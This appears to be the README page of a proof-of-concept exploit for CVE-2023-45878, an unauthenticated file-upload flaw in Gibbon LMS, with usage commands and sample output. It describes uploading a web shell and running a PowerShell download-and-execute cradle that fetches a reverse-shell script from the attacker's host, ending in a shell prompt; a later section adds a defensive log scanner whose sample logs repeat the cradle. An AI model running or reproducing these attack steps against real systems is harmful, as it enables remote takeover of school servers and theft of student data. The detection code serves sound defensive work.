
CVE-2023-45878 PoC — Gibbon Security Vulnerability

Associated Vulnerability
Title: Gibbon security vulnerability (CVE-2023-45878)
Description: Gibbon is a school platform that addresses the practical problems educators face every day. GibbonEdu Gibbon version 25.0.1 contains a security vulnerability that allows an unauthenticated attacker to upload arbitrary files to the application and execute code on the underlying system.
Description: CVE-2023-45878 PoC for Gibbon LMS on XAMPP (Windows)
Readme
# CVE-2023-45878-POC
CVE-2023-45878 PoC for Gibbon LMS running on XAMPP (Windows).
It uploads a web shell called shell.php that executes commands passed to it.
In reverse-shell mode it also serves a PowerShell reverse-shell script called shell.ps1, which is delivered to the target machine through shell.php.

# Requirements
- Python 3
- The `requests` Python 3 module
- netcat
```shell
pip3 install requests
```
## Virtual env
```shell
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests
```

# Usage
Tested against Gibbon LMS running in XAMPP on Windows with no AV enabled.
The target URL is the base URL of the Gibbon login page, for example http://gibbon-example/Gibbon-LMS/

## Reverse shell
```shell
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>
```

## Single command
```shell
python3 reverse.py --single -target_url http://target -command whoami
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice
```
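As an added defensive example (not code from the PoC, from Gibbon or from XAMPP), the following Python scans Apache-style access log lines, constructed here, for the request patterns visible in the two results above: a PHP file called with a `cmd` parameter, a PowerShell download cradle in the query string, and a PHP file called with a bare query token such as `shell.php?whoami`.

```python
# Added detection example; the log lines and rule names below are constructed.
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache/XAMPP combined log prefix: host ident user [time] "METHOD path HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# PowerShell download-and-execute cradle keywords, matched after URL decoding
CRADLE_RE = re.compile(r'\b(iex|invoke-expression|downloadstring|downloadfile)\b', re.I)


def analyse_line(line):
    """Return a list of 'rule path' findings for one access log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group('path'))
    params = parse_qs(url.query, keep_blank_values=True)
    is_php = url.path.lower().endswith('.php')
    findings = []
    # Rule 1: a PHP script invoked with a cmd parameter (the web-shell calling convention above)
    if is_php and 'cmd' in params:
        findings.append(f'php-cmd-param {url.path}')
    # Rule 2: a PowerShell cradle anywhere in the decoded query string
    if CRADLE_RE.search(unquote_plus(url.query)):
        findings.append(f'powershell-cradle {url.path}')
    # Rule 3 (noisier): a PHP script whose whole query is one bare token, e.g. shell.php?whoami
    if is_php and len(params) == 1 and list(params.values()) == [['']]:
        findings.append(f'php-bare-query {url.path}')
    return findings


def scan(log_text):
    """Group the findings of every suspicious line by remote host."""
    report = {}
    for line in log_text.splitlines():
        found = analyse_line(line)
        if found:
            report.setdefault(LOG_RE.match(line).group('host'), []).extend(found)
    return report


SAMPLE_LOG = """\
10.0.0.5 - - [20/Mar/2025:12:58:40 +0100] "GET /Gibbon-LMS/index.php?q=/modules/Students/student_view.php HTTP/1.1" 200 5123
10.0.0.9 - - [20/Mar/2025:12:59:10 +0100] "GET /Gibbon-LMS/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//10.0.0.9%3A8000/shell.ps1%27%29 HTTP/1.1" 200 12
10.0.0.9 - - [20/Mar/2025:13:01:02 +0100] "GET /Gibbon-LMS/shell.php?cmd=whoami HTTP/1.1" 200 20
10.0.0.9 - - [20/Mar/2025:13:01:30 +0100] "GET /Gibbon-LMS/shell.php?whoami HTTP/1.1" 200 20
"""

if __name__ == '__main__':
    for host, found in scan(SAMPLE_LOG).items():
        print(host, found)
```

Rule 3 will also fire on legitimate scripts that take a bare query token, so pair it with a file-integrity check of the web root for PHP files that are not part of the Gibbon release.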

# Credits
https://herolab.usd.de/security-advisories/usd-2023-0025/
File Snapshot

```text
[4.0K] /data/pocs/9108c23b5dc95d7e0fc9ad4a533f8278713687f1
├── [6.6K] CVE-2023-45878.py
└── [1.9K] README.md

0 directories, 2 files
```